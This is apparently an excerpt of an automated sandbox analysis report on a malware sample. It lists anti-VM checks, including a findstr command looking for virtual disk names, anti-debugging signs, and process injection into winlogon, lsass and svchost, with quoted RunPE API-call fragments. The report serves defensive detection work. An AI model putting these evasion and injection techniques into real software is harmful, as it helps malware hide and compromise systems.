Source: powershell.exe, 00000008.00000002.1695772455.00000201D5A97000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5A97000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: -Hyper-V Remote Desktop Virtualization Service
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5B87000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmmouse.sys
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5A97000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
Source: cmd.exe, 00000013.00000003.1682676692.000001EBD5365000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.1690176573.000001EBD5366000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.1690012290.000001EBD5366000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: findstr /i /c:"QEMU HARDDISK" /c:"DADY HARDDISK" /c:"WDS100T2B0A"
Source: C:\Windows\System32\dllhost.exeAPI call chain: ExitProcess graph end nodegraph_40-15439
Source: C:\Windows\System32\dllhost.exeAPI call chain: ExitProcess graph end nodegraph_40-15610
Source: C:\Windows\System32\wbem\WMIC.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebugger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugFlagsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugObjectHandleJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugFlags
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPort
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugObjectHandle
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 38_2_00007FFB4B1036CD rdtsc 38_2_00007FFB4B1036CD
Source: C:\Windows\System32\conhost.exeCode function: 20_2_000001B4449084B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_000001B4449084B0
Source: C:\Windows\System32\conhost.exeCode function: 20_2_000001B444901E3C LoadLibraryA,GetProcAddress,SleepEx,20_2_000001B444901E3C
Source: C:\Windows\System32\conhost.exeCode function: 20_2_000001B444901000 GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,20_2_000001B444901000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\dllhost.exeProcess token adjusted: Debug
Source: C:\Windows\System32\conhost.exeCode function: 20_2_000001B444908814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,20_2_000001B444908814
Source: C:\Windows\System32\conhost.exeCode function: 20_2_000001B4449084B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_000001B4449084B0
Source: C:\Windows\System32\conhost.exeCode function: 20_2_000001B44490CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_000001B44490CD80
Source: C:\Windows\System32\dllhost.exeCode function: 40_2_000001C0401C8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,40_2_000001C0401C8814
Source: C:\Windows\System32\dllhost.exeCode function: 40_2_000001C0401C84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,40_2_000001C0401C84B0
Source: C:\Windows\System32\dllhost.exeCode function: 40_2_000001C0401CCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,40_2_000001C0401CCD80
Source: C:\Windows\System32\dllhost.exeCode function: 40_2_000001C0401F8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,40_2_000001C0401F8814
Source: C:\Windows\System32\dllhost.exeCode function: 40_2_000001C0401F84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,40_2_000001C0401F84B0
Source: C:\Windows\System32\dllhost.exeCode function: 40_2_000001C0401FCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,40_2_000001C0401FCD80
Source: C:\Windows\System32\winlogon.exeCode function: 41_2_000002E991758814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,41_2_000002E991758814
Source: C:\Windows\System32\winlogon.exeCode function: 41_2_000002E99175CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,41_2_000002E99175CD80
Source: C:\Windows\System32\winlogon.exeCode function: 41_2_000002E9917584B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,41_2_000002E9917584B0
Source: C:\Windows\System32\winlogon.exeCode function: 41_2_000002E991788814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,41_2_000002E991788814
Source: C:\Windows\System32\winlogon.exeCode function: 41_2_000002E99178CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,41_2_000002E99178CD80
Source: C:\Windows\System32\winlogon.exeCode function: 41_2_000002E9917884B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,41_2_000002E9917884B0
Source: C:\Windows\System32\svchost.exeCode function: 43_2_00000158709D8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,43_2_00000158709D8814
Source: C:\Windows\System32\svchost.exeCode function: 43_2_00000158709D84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,43_2_00000158709D84B0
Source: C:\Windows\System32\svchost.exeCode function: 43_2_00000158709DCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,43_2_00000158709DCD80
Source: C:\Windows\System32\svchost.exeCode function: 45_2_000002A3F0668814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,45_2_000002A3F0668814
Source: C:\Windows\System32\svchost.exeCode function: 45_2_000002A3F06684B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,45_2_000002A3F06684B0
Source: C:\Windows\System32\svchost.exeCode function: 45_2_000002A3F066CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,45_2_000002A3F066CD80

HIPS / PFW / Operating System Protection Evasion

barindex
Source: 37.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs.Net Code: Run contains injection code
Source: 38.2.powershell.exe.1a3a6b20000.15.raw.unpack, RunPE.cs.Net Code: Run contains injection code
Source: 38.2.powershell.exe.1a39e603b88.11.raw.unpack, RunPE.cs.Net Code: Run contains injection code
Source: 37.2.powershell.exe.4040b0.1.raw.unpack, Unhook.csReference to suspicious API methods: VirtualProtect((IntPtr)((long)moduleHandle + num5), (IntPtr)num6, 64u, out var oldProtect)
Source: 37.2.powershell.exe.4040b0.1.raw.unpack, RunPE.csReference to suspicious API methods: OpenProcess(128, inheritHandle: false, parentProcessId)
Source: 37.2.powershell.exe.4040b0.1.raw.unpack, RunPE.csReference to suspicious API methods: NtAllocateVirtualMemory(process, ref address, IntPtr.Zero, ref size2, 12288u, 64u)
Source: 37.2.powershell.exe.4040b0.1.raw.unpack, RunPE.csReference to suspicious API methods: NtWriteVirtualMemory(process, address, payload, num3, IntPtr.Zero)
Source: 37.2.powershell.exe.4040b0.1.raw.unpack, RunPE.csReference to suspicious API methods: NtSetContextThread(thread, intPtr5)
Source: C:\Windows\System32\dllhost.exeCode function: 40_2_0000000140002434 CreateProcessW,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,OpenProcess,TerminateProcess,40_2_0000000140002434
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe EIP: 8500000
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\winlogon.exe EIP: 91722EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\lsass.exe EIP: BDCB2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 709A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\winlogon.exe EIP: 91722EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\lsass.exe EIP: BDCB2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 709A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\dwm.exe EIP: B1632EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: EFFC2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: AFB82EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 6F7B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 7C382EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 82772EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\dwm.exe EIP: B1602EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: EFFC2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: AFB82EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 6F7B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 1B1D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 7C382EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 82772EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 1B1D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 6AD72EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 6AD42EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: D3CD2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 73D32EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 21B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: D3CA2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 73D32EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 21B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: BA662EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: B9FD2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 54D82EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 55342EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 57DD2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 57DA2EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 33B72EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 74532EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 15742EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 33B42EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C8542EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 212A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 74532EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6D542EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 15742EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D8952EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C8542EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4332EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 212A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8E72EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6D542EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 19362EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 31802EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4332EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DD9B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8E72EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FA1C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 19362EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D52EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 31802EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D2562EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5192EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FA1C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D1A02EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D52EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D2562EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B0FC2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5192EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6E552EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D1A02EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FC5C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B0FC2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FAC2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6E552EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1A932EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FC5C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 88F92EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FAC2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 857C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1A932EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DEDC2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 88F92EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A2112EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 857C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9D92EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DEDC2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FBEC2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A2112EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7C622EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9D92EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 59752EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FBEC2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AB592EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7C622EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F95A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 59752EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9EEE2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AB592EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2B2E2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F95A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CC6E2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9EEE2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8262EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2B2E2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14DD2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CC6E2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 44F72EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8262EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2ED52EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14DD2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E6AF2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 44F72EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 84C22EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A0712EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E6AF2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4DDB2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 84C22EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F4C92EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A0712EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A50F2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4DDB2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4ACF2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F4C92EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 85DA2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A50F2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7CDE2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4ACF2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 94182EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 85DA2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 54372EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7CDE2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 94182EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 543A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 749D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C9A22EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 749D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C9CB2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AD92EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: ADC2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 85A52EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 85A82EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A4192EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A41C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BB25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13F25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AD25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AF25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BF25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DC25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DE25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DD25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DF25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5C25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DE25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BA25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BC25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C525AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12725AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BB25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BA25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BC25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13F25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DB25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AB25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AD25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CD25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CF25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6F25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C625AC
